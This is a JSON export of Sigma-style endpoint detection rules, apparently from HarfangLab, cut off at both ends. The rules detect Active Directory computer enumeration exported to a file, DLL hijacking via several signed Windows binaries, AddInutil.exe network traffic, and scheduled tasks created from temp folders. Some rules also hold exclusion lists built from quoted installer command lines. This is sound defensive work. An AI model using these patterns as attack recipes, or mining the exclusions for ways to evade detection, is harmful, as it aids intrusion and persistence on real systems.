"last_update": "2026-03-23T11:45:34.604776Z",
"creation_date": "2026-03-23T11:45:34.604780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604787Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_powershell_get_adcomputer.yml",
"content": "title: Get-ADComputer PowerShell Cmdlet Results Exported\nid: 74d9e50a-fabb-42bb-90dc-e3077f67a6da\ndescription: |\n Detects the usage of Get-ADComputer PowerShell cmdlet whose results are exported to a file.\n The Get-ADComputer cmdlet allows to enumerate Domain computers' properties.\n This is a classic discovery technique used by attackers to get an overview of assets enrolled in the Active Directory.\n It is recommended to analyze the process responsible for the execution of the cmdlet to look for malicious content as well as to correlate this alert with other potential discovery activities on the host.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2024/02/22\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Get-ADComputer -Filter \\* -Properties \\* | Export-CSV '\n - 'Get-ADComputer -Filter \\* -Properties \\* | Out-File'\n - 'Set-Content -Path * -Value (Get-ADComputer -Filter \\* -Properties \\*)'\n - 'Add-Content -Path * -Value (Get-ADComputer -Filter \\* -Properties \\*)'\n\n exclusion_listing:\n PowershellCommand|contains:\n - '\\Install\\scripts\\list_Computer.ps1'\n - '\\SCRIPT\\List_Computer.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74d9e50a-fabb-42bb-90dc-e3077f67a6da",
"rule_name": "Get-ADComputer PowerShell Cmdlet Results Exported",
"rule_description": "Detects the usage of the Get-ADComputer PowerShell cmdlet whose results are exported to a file.\nThe Get-ADComputer cmdlet allows enumeration of domain computers' properties.\nThis is a classic discovery technique used by attackers to get an overview of the assets enrolled in the Active Directory.\nIt is recommended to analyze the process responsible for the execution of the cmdlet to look for malicious content, as well as to correlate this alert with other potential discovery activities on the host.\n",
"rule_creation_date": "2024-02-22",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74e8fff3-ecca-4f51-a9e7-46d86eca135d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593422Z",
"creation_date": "2026-03-23T11:45:34.593425Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593433Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sgrmlpac.yml",
"content": "title: DLL Hijacking via SgrmLpac.exe\nid: 74e8fff3-ecca-4f51-a9e7-46d86eca135d\ndescription: |\n Detects potential Windows DLL Hijacking via SgrmLpac.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SgrmLpac.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74e8fff3-ecca-4f51-a9e7-46d86eca135d",
"rule_name": "DLL Hijacking via SgrmLpac.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SgrmLpac.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "75594437-cac0-4935-a8ee-5bf04bc63744",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089855Z",
"creation_date": "2026-03-23T11:45:34.089858Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089865Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pcaui.yml",
"content": "title: DLL Hijacking via pca.exe\nid: 75594437-cac0-4935-a8ee-5bf04bc63744\ndescription: |\n Detects potential Windows DLL Hijacking via pca.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcaui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\pcaui.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "75594437-cac0-4935-a8ee-5bf04bc63744",
"rule_name": "DLL Hijacking via pca.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pca.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "75ebf1b7-01fe-4fa5-99d6-3329b1c4c8d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097291Z",
"creation_date": "2026-03-23T11:45:34.097293Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wscollect.yml",
"content": "title: DLL Hijacking via WSCollect.exe\nid: 75ebf1b7-01fe-4fa5-99d6-3329b1c4c8d9\ndescription: |\n Detects potential Windows DLL Hijacking via WSCollect.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WSCollect.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "75ebf1b7-01fe-4fa5-99d6-3329b1c4c8d9",
"rule_name": "DLL Hijacking via WSCollect.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WSCollect.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "75f3fc65-b2ce-41df-a858-9ba8887a021f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087249Z",
"creation_date": "2026-03-23T11:45:34.087253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html",
"https://lolbas-project.github.io/lolbas/Binaries/Addinutil/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_addinutil_network_connection.yml",
"content": "title: Suspicious AddInutil.exe Network Communication\nid: 75f3fc65-b2ce-41df-a858-9ba8887a021f\ndescription: |\n Detects a suspicious network connection from the Add-In deployment cache updating utility (AddInutil.exe).\n Adversaries can use this utility to proxy the execution of malicious code and make their command and control connections stealthier.\n It is recommended to investigate the target of the network connection, the parent process of AddInutil.exe and other malicious activities on the machine.\nreferences:\n - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\n - https://lolbas-project.github.io/lolbas/Binaries/Addinutil/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/10/27\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.LOLBin.AddInutil\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessOriginalFileName: 'addinutil.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "75f3fc65-b2ce-41df-a858-9ba8887a021f",
"rule_name": "Suspicious AddInutil.exe Network Communication",
"rule_description": "Detects a suspicious network connection from the Add-In deployment cache updating utility (AddInutil.exe).\nAdversaries can use this utility to proxy the execution of malicious code and make their command and control connections stealthier.\nIt is recommended to investigate the target of the network connection, the parent process of AddInutil.exe and other malicious activities on the machine.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1071",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "76107997-084f-46ed-aae8-41ca44b17c7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608984Z",
"creation_date": "2026-03-23T11:45:34.608988Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608995Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_temp_scheduled_task.yml",
"content": "title: Scheduled Task Created in Temporary Directory\nid: 76107997-084f-46ed-aae8-41ca44b17c7c\ndescription: |\n Detects a scheduled task created from a temporary directory.\n Adversaries may abuse the Windows Task Scheduler for persistence or privilege escalation.\n It is recommended to investigate the parent process of schtasks to look for malicious content or actions, as well as the target the scheduled task to determine whether it is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/02/08\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n\n selection_command:\n # \"C:\\Windows\\System32\\schtasks.exe\" /create /xml c:\\users\\user\\appdata\\local\\temp\\elevator.xml /tn elevator\n CommandLine|contains|all:\n - '/create '\n - '/tn '\n\n selection_path:\n CommandLine:\n - '*\\AppData\\Local\\Temp\\\\*' # any file extension is possible here\n - '*\\Windows\\Temp\\\\*' # any file extension is possible here\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_samsung:\n ParentCommandLine: '\"?:\\Program Files (x86)\\Samsung\\Settings\\MyLoginLauncher.exe\" /install'\n\n exclusion_teamviewer1:\n # C:\\WINDOWS\\system32\\schtasks /Create /TN TVInstallRestore /TR \"C:\\Users\\SVC-PD~1\\AppData\\Local\\Temp\\TeamViewer\\TeamViewer_.exe /RESTORE\" /RU SYSTEM /SC ONLOGON /F\n ParentImage|endswith:\n - '\\TeamViewer\\TeamViewer_.exe'\n - '\\TeamViewer\\\\*\\TeamViewer_.exe'\n CommandLine|endswith: ' /RU SYSTEM /SC ONLOGON /F'\n\n exclusion_teamviewer2:\n ParentImage: 
'*\\AppData\\Local\\Temp\\TeamViewer\\update.exe'\n GrandparentImage:\n - '?:\\Program Files\\TeamViewer\\TeamViewer.exe'\n - '?:\\Program Files (x86)\\TeamViewer\\TeamViewer_Service.exe'\n - '?:\\Program Files (x86)\\Teamviewer\\\\*\\TeamViewer_Service.exe'\n\n exclusion_realtek:\n # parent: C:\\Windows\\System32\\DriverStore\\FileRepository\\realtekservice.inf_amd64_e9f6c354061743a4\\RtkAudUService64.exe\n # schtask cmdline : schtasks /create /Tn RtkAudUService64_BG /XML \"C:\\Windows\\TEMP\\ST_CPL.pkg.XML\" /F\n ParentImage:\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\RtkAudUService64.exe'\n - '?:\\Windows\\System32\\RtkAudUService64.exe'\n\n exclusion_atisetup:\n CommandLine|contains|all:\n - 'AMDLinkUpdate'\n - '\\AppData\\Local\\Temp\\\\\\\\AMDLinkDriverUpdate.xml'\n ParentImage: '*\\Driver\\Bin64\\ATISetup.exe'\n GrandparentImage: '*\\Driver\\Setup.exe'\n\n exclusion_lenovo:\n # \"C:\\windows\\system32\\schtasks.exe\" /create /tn \"Lenovo Active Protection System\" /xml \"C:\\windows\\TEMP\\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}\\aps.xml\"\n CommandLine|contains|all:\n - ' /create /tn '\n - 'Lenovo Active Protection System'\n - ' /xml '\n - '\\TEMP\\{????????-????-????-????-????????????}\\aps.xml'\n ParentCommandLine: '?:\\windows\\system32\\msiexec.exe /V'\n GrandparentImage: '?:\\windows\\system32\\services.exe'\n\n exclusion_hp_keyboard:\n # schtasks.exe /Create /TN HP\\HP Collaboration Keyboard\\HP Collaboration Keyboard Controller /XML C:\\Users\\XXX\\AppData\\Local\\Temp\\{C9EECB6F-C41B-4BF5-8203-F7A50B088573}\\HPCollaborationKeyboardTask64bit.xml /F\n CommandLine|contains|all:\n - 'schtasks.exe /Create /TN HP\\HP Collaboration Keyboard\\HP Collaboration Keyboard Controller'\n - 'HPCollaborationKeyboardTask64bit.xml'\n ParentCommandLine: '?:\\windows\\system32\\msiexec.exe /V'\n GrandparentImage: '?:\\windows\\system32\\services.exe'\n\n exclusion_conexant:\n ParentImage:\n - '?:\\program 
files\\conexant\\install\\audio\\sa3\\x64\\setup64.exe'\n - '?:\\Windows\\Temp\\UIU_IROR_???????????\\x64\\Setup64.exe'\n CommandLine|contains: ' /tn \\microsoft\\windows\\conexant\\sa3' # c:\\windows\\system32\\schtasks.exe /create /xml c:\\windows\\temp\\62469ba22d8.xml /tn \\microsoft\\windows\\conexant\\sa3\n\n exclusion_deployapplication:\n # from here : https://github.com/PSAppDeployToolkit/PSAppDeployToolkit\n\n # c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -executionpolicy bypass -noprofile -nologo -windowstyle hidden -command & { & 'c:\\windows\\ccmcache\\ed\\deploy-application.ps1' -deploymode silent; exit $lastexitcode }\n # c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -executionpolicy bypass -noprofile -nologo -windowstyle hidden -command & { & 'c:\\users\\xxx\\documents\\workplace\\applications\\metrologic-silma-x4-v17-fr-x64-1.0.0-sls\\deploy-application.ps1' -deploymenttype uninstall -deploymode silent; exit $lastexitcode }\n\n ParentCommandLine|contains:\n - '?:\\Windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n # c:\\windows\\system32\\schtasks.exe /create /f /tn siemens_teamcenter_12.4.0_x64_ml_01_blockedapps /xml c:\\windows\\temp\\psappdeploytoolkit\\schtaskunblockapps.xml\n # c:\\windows\\system32\\schtasks.exe /create /f /tn dassaultsystemes_edrawings2019_2019_x64_ml_1.0.0_blockedapps /xml c:\\windows\\temp\\psappdeploytoolkit\\schtaskunblockapps.xml\n # c:\\windows\\system32\\schtasks.exe /create /f /tn autodesk_autocadlt2020_2020_x64_en_01_blockedapps /xml c:\\windows\\temp\\psappdeploytoolkit\\schtaskunblockapps.xml\n CommandLine|contains:\n - '\\psappdeploytoolkit\\schtaskunblockapps.xml'\n - '\\psappdeploytoolkit\\psappdeploytoolkit-executeasuser.xml'\n\n exclusion_deployapplication_powershell_ise:\n # c:\\windows\\system32\\windowspowershell\\v1.0\\powershell_ise.exe\n ParentCommandLine|contains|all: 
'\\windows\\system32\\windowspowershell\\v1.0\\powershell_ise.exe'\n CommandLine|contains:\n - 'psappdeploytoolkit\\schtaskunblockapps.xml'\n - 'psappdeploytoolkit\\psappdeploytoolkit-executeasuser.xml'\n\n exclusion_wapt:\n GrandparentImage|endswith:\n - '\\wapt\\waptpython.exe'\n - '\\wapt\\wapt-get.exe'\n # schtasks /Create /F /TN fullwaptupgrade /XML c:\\windows\\temp\\tmpteb05q.xml\n # schtasks /Create /RU SYSTEM /SC ONSTART /TN fullwaptupgrade /TR c:\\windows\\temp\\waptdeploy.exe --hash=72dd1bb28863f5e12b1f24b89de4b38c477459e75ceedecfb8bc4fdfa7e97999 --waptsetupurl=c:\\windows\\temp\\waptagent.exe --wait=15 --temporary --force --minversion=1.8.0.6639 /F /V1 /Z\n # schtasks /Create /SC ONCE /TN fullwaptupgrade /TR 'c:\\windows\\temp\\waptdeploy.exe' --hash=04ff657a08c9b967d8b4634690ed7e05bf550287fd93bbf86068bdd0eaf69178 --waptsetupurl=c:\\windows\\temp\\waptagent.exe --wait=15 --temporary --force --minversion=1.8.2.7393 /ST 14:03:57 /RU SYSTEM /F /V1 /Z\n CommandLine|contains:\n - ' /Create /F /TN fullwaptupgrade /XML ?:\\WINDOWS\\TEMP\\tmp*.xml'\n - ' /Create /RU SYSTEM /SC ONSTART /TN fullwaptupgrade /TR ?:\\windows\\temp\\waptdeploy.exe *'\n - ' /Create*fullwaptupgrade*windows\\temp\\waptdeploy.exe*'\n\n exclusion_alienware:\n CommandLine:\n - '?:\\Windows\\system32\\SchTasks.exe /tn \\AWCC\\Update /create /xml ?:\\Windows\\TEMP\\\\*\\AWCCUpdater.xml*'\n - '?:\\Windows\\system32\\SchTasks.exe /tn \\AWCC\\Update /create /xml ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\AWCCUpdater.xml'\n ParentImage:\n - '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n\n exclusion_dell_updater:\n CommandLine: '?:\\Windows\\system32\\SchTasks.exe /tn MyDell.Updater /create /xml ?:\\Windows\\TEMP\\{????????-????-????-????-????????????}\\\\MyDellUpdater.xml'\n ParentImage: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n\n 
exclusion_amd:\n CommandLine:\n - 'schtasks /Create /TN AMDInstallLauncher /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\AMDAUEPInstaller.xml'\n - 'schtasks /Create /TN AMDScoSupportTypeUpdate /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\AMDScoSupportTypeUpdate.xml'\n - 'schtasks /Create /TN AMDLinkUpdate /XML ?:\\Windows\\TEMP\\\\\\\\AMDLinkDriverUpdate.xml'\n - 'schtasks /Create /TN AMDLinkUpdate /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\AMDLinkDriverUpdate.xml'\n - 'schtasks /Create /TN ModifyLinkUpdate /XML ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\\\\\ModifyLinkUpdateNew.xml'\n ParentImage|endswith:\n - '\\Bin64\\AMDSoftwareInstaller.exe'\n - '\\Bin64\\ATISetup.exe'\n - '\\BIN64\\RadeonInstaller.exe'\n\n exclusion_acer:\n ParentImage:\n - '?:\\Program Files (x86)\\Acer\\Acer Jumpstart\\hermes.exe'\n - '?:\\ProgramData\\OEM\\UpgradeTool\\Quick_Access_V_3_0\\UpgradeToolC.exe'\n - '?:\\ProgramData\\OEM\\UpgradeTool\\CareCenter_v4\\UpgradeToolC.exe'\n - '?:\\ProgramData\\OEM\\UpgradeTool\\CareCenter_v4\\\\*FixpackB\\BUnzip\\Setup_msi.exe'\n\n exclusion_heidisql:\n CommandLine: '?:\\Windows\\System32\\schtasks.exe /Create /TN C__*_HeidiSQL_heidisql.exe /xml *\\AppData\\Local\\Temp\\HeidiSQL_task_restart.xml'\n\n exclusion_avira:\n ParentImage: '*\\AppData\\Local\\Temp\\\\*\\avira_spotlight_setup_*.tmp'\n CommandLine|contains:\n - 'schtasks.exe /Create /F /TN Avira_Security_Systray /XML '\n - 'schtasks.exe /Create /F /TN Avira_Security_Maintenance /XML '\n\n exclusion_git:\n CommandLine: 'schtasks /Create /F /TN Git for Windows Updater /XML *\\AppData\\Local\\Temp\\\\*\\auto-updater.xml'\n ParentImage:\n - '*\\AppData\\Local\\Temp\\\\*\\gfw-install-*.tmp'\n - '?:\\Windows\\Temp\\\\*\\git-*.tmp'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of a scheduled task in the user temporary directory by an administrator or 3rd party application.\nlevel: low\n# level: medium\nconfidence: moderate\n",
"block_on_agent": false,
